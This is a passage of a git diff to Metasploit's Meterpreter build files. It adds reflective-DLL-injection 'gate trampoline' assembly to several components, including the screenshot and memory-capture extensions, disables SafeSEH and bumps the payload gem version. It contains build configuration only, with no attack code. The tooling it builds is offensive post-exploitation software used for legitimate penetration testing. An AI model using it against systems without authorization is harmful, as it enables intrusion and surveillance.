<ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -261,6 +263,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -315,6 +318,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -370,6 +374,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -424,6 +429,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -442,6 +448,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\extensions\unhook\refresh.h" /> <ClInclude Include="..\..\source\extensions\unhook\unhook.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> @@ -449,4 +467,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt b/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt index 99c8eaa32..44401059a 100644 --- a/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt @@ -43,7 +43,7 @@ set(LINK_LIBS ws2_32 ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj b/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj index 77709c765..03ac0a384 100644 --- a/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj +++ b/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj @@ -151,6 +151,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -205,6 +206,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -258,6 +260,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -312,6 +315,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -367,6 +371,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -421,6 +426,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -446,8 +452,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <DeploymentContent>false</DeploymentContent> </ResourceCompile> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/meterpreter.sln b/c/meterpreter/workspace/meterpreter.sln index 453025ea6..df9f541d6 100644 --- a/c/meterpreter/workspace/meterpreter.sln +++ b/c/meterpreter/workspace/meterpreter.sln @@ -1,7 +1,7 @@ Microsoft Visual Studio Solution File, Format Version 12.00 -# Visual Studio Version 17 -VisualStudioVersion = 17.0.32112.339 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.33801.447 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_priv", "ext_server_priv\ext_server_priv.vcxproj", "{87C64204-C82F-415D-AF45-D0B33BDFE39A}" EndProject diff --git a/c/meterpreter/workspace/metsrv/CMakeLists.txt b/c/meterpreter/workspace/metsrv/CMakeLists.txt index 0cf47cde8..c75dc8b11 100644 --- a/c/meterpreter/workspace/metsrv/CMakeLists.txt +++ b/c/meterpreter/workspace/metsrv/CMakeLists.txt @@ -38,7 +38,7 @@ else() set(LINK_LIBS ${LINK_LIBS} ws2_32) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) # Post processing (required for all Meterpreter DLLs) editbin(${PROJECT_NAME} ${BIN_SUBSYSTEM}) diff --git a/c/meterpreter/workspace/metsrv/metsrv.vcxproj b/c/meterpreter/workspace/metsrv/metsrv.vcxproj index e307b3993..f08b1b983 100644 --- a/c/meterpreter/workspace/metsrv/metsrv.vcxproj +++ b/c/meterpreter/workspace/metsrv/metsrv.vcxproj @@ -174,6 +174,7 @@ <SubSystem>Windows</SubSystem> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -246,6 +247,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -316,6 +318,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <SubSystem>Windows</SubSystem> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -338,7 +341,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> </HeaderFileName> </Midl> <ClCompile> - <Optimization>MinSpace</Optimization> + <Optimization>Custom</Optimization> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> @@ -359,6 +362,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors> <TreatWarningAsError>true</TreatWarningAsError> <MultiProcessorCompilation>true</MultiProcessorCompilation> + <OmitFramePointers>true</OmitFramePointers> </ClCompile> <ResourceCompile> <PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions> @@ -384,6 +388,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <SubSystem>Windows</SubSystem> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -453,6 +458,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -521,6 +527,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <SubSystem>Windows</SubSystem> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -590,6 +597,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClCompile Include="..\..\source\metsrv\zlib.c" /> <ClCompile Include="..\..\source\logging\logging.c" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> diff --git a/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters b/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters index 5a497eff9..31fe6945c 100644 --- a/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters +++ b/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters @@ -55,4 +55,8 @@ <ClCompile Include="..\..\source\metsrv\metapi.c" /> <ClCompile Include="..\..\source\logging\logging.c" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm" /> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm" /> + </ItemGroup> </Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/screenshot/CMakeLists.txt b/c/meterpreter/workspace/screenshot/CMakeLists.txt index fbecb862f..da3ffcc44 100644 --- a/c/meterpreter/workspace/screenshot/CMakeLists.txt +++ b/c/meterpreter/workspace/screenshot/CMakeLists.txt @@ -25,7 +25,7 @@ set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DI set_source_files_properties(${MOD_DEF_DIR}/plugin.def PROPERTIES HEADER_FILE_ONLY TRUE) set(LINK_LIBS jpeg) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/screenshot/screenshot.vcxproj b/c/meterpreter/workspace/screenshot/screenshot.vcxproj index b6f2b02e1..3186ca82a 100644 --- a/c/meterpreter/workspace/screenshot/screenshot.vcxproj +++ b/c/meterpreter/workspace/screenshot/screenshot.vcxproj @@ -149,6 +149,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\plugin.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -196,6 +197,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -242,6 +244,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\plugin.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -290,6 +293,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\plugin.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -340,6 +344,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -388,6 +393,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\plugin.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -403,6 +409,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\screenshot\bmp2jpeg.h" /> <ClInclude Include="..\..\source\screenshot\screenshot.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> @@ -410,4 +428,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/gem/lib/metasploit-payloads/version.rb b/gem/lib/metasploit-payloads/version.rb index ee31ed2ba..88e1011d4 100644 --- a/gem/lib/metasploit-payloads/version.rb +++ b/gem/lib/metasploit-payloads/version.rb @@ -1,6 +1,6 @@ # -*- coding:binary -*- module MetasploitPayloads - VERSION = '2.0.163' + VERSION = '2.0.166' def self.version VERSION